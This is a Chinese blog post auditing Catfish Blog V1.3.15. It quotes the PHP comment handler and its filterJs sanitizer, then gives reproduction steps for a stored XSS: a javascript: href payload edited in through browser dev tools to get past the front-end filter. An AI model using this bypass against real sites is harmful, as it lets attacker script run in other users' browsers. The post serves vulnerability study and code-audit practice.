Catfish(鲶鱼) Blog V1.3.15存储型 xss
zhuangnet 2020-03-05
0x00前言
开始从小的漏洞开始练习,搬运项目地址:
https://github.com/imsebao/Code-Audit
0x01
Catfish(鲶鱼) Blog前台文章评论处存在 存储型xss漏洞。 在 application\index\controller\index.php 文件第 692行
public function pinglun()
{
$beipinglunren = Db::name('posts')->where('id',Request::instance()-
>post('id'))->field('post_author')->find();
$comment = Db::name('options')->where('option_name','comment')-
>field('option_value')->find();
$plzt = 1;
if($comment['option_value'] == 1)
{
$plzt = 0;
}
$uid = 0;
if(Session::has($this->session_prefix.'user_id'))
{
$uid = Session::get($this->session_prefix.'user_id');
}
$data = [
'post_id' => Request::instance()->post('id'),
'url' => 'index/Index/article/id/'.Request::instance()->post('id'),
'uid' => $uid,
'to_uid' => $beipinglunren['post_author'],
'createtime' => date("Y-m-d H:i:s"),
'content' => $this->filterJs(Request::instance()->post('pinglun')),
'status' => $plzt
];
Db::name('comments')->insert($data);
Db::name('posts')
->where('id', Request::instance()->post('id'))
->update([
'post_comment' => date("Y-m-d H:i:s"),
'comment_count' => ['exp','comment_count+1']
]);
$param = '';
Hook::add('comment_post',$this->plugins);
Hook::listen('comment_post',$param,$this->ccc);
}参数 content 经过了 filterJs 过滤,继续跟进 filterJs
在文件 application\index\controller\Common.php 第831行
protected function filterJs($str)
{
while(stripos($str,'<script') !== false || stripos($str,'<style') !==
false || stripos($str,'<iframe') !== false || stripos($str,'<frame') !== false
|| stripos($str,'onclick') !== false)
{
$str = preg_replace(['/<script[\s\S]*?
<\/script[\s]*>/i','/<style[\s\S]*?<\/style[\s]*>/i','/<iframe[\s\S]*?
[<\/iframe|\/][\s]*>/i','/<frame[\s\S]*?[<\/frame|\/][\s]*>/i','/on[A-Za-z]+
[\s]*=[\s]*[\'|"][\s\S]*?[\'|"]/i'],'',$str);
}
return $str;
}看一下这里的逻辑,判断字符串是否存在
漏洞复现: 前台页面找一篇文章,进行评论。评论加入超链接,这里因为有前端过滤所以不能直接输入 payload,随便填写,然后F12修改超链接地址为 xsspayload
<a target="_self" href="javascript:onmouseover=alert(123)">http://javascript:onmouseover=alert(123).c</a>
这样就绕过了前端认证,提交评论。
然后访问文章,点击评论触发xss漏洞。
emmm一个挺简单的XSS,这里的话仅仅是因为前端过滤,导致我们可以绕过。前端验证的话bp抓包应该也可以。这里简单记录一下,后面如果出现类似的漏洞成因就不再记录了。只写一些有趣的XSS了。
相关推荐
zxznsjdsj 0喜欢 / 0评论 2020-05-17
tianzyc 0喜欢 / 0评论 2020-02-01
Schvian 0喜欢 / 0评论 2013-06-03
WindowsandLinux 0喜欢 / 0评论 2013-07-24
enginetanmary 0喜欢 / 0评论 2014-06-17
samwong 0喜欢 / 0评论 2014-05-14
XCMercy 0喜欢 / 0评论 2019-12-14
newfarhui 0喜欢 / 0评论 2019-12-09
bloghongxiorg 0喜欢 / 0评论 2015-08-18
wanzi 0喜欢 / 0评论 2015-08-24
86590798 0喜欢 / 0评论 2015-07-31
aNian 0喜欢 / 0评论 2019-10-25
lolafon 0喜欢 / 0评论 2015-04-18
codedecode 0喜欢 / 0评论 2017-07-26
生活随笔 0喜欢 / 0评论 2017-07-26
hyfcomeon 0喜欢 / 0评论 2016-07-22
zhaohaifan 0喜欢 / 0评论 2016-07-08
kekekid 0喜欢 / 0评论 2015-08-24
zxiaozhuT 0喜欢 / 0评论 2015-07-31
goawalk 0喜欢 / 0评论 2014-07-28
小七飞天 0喜欢 / 0评论 2014-07-28
宁静致远 0喜欢 / 0评论 2014-07-25
Will0 0喜欢 / 0评论 2014-07-19
lerdor 0喜欢 / 0评论 2014-02-21
leeknives 0喜欢 / 0评论 2016-01-05
changjiang 0喜欢 / 0评论 2015-11-04
zhangyangffff 0喜欢 / 0评论 2015-11-04
旭灿 0喜欢 / 0评论 2011-06-19
88251048 0喜欢 / 0评论 2014-08-20
shutFuckingup 0喜欢 / 0评论 2011-05-13
wangwen 0喜欢 / 0评论 2018-04-18
蜗牛Running 0喜欢 / 0评论 2015-12-15
DayDayUpTianTian 0喜欢 / 0评论 2013-02-16
gsl 0喜欢 / 0评论 2014-10-22
SenGeZi 0喜欢 / 0评论 2012-02-25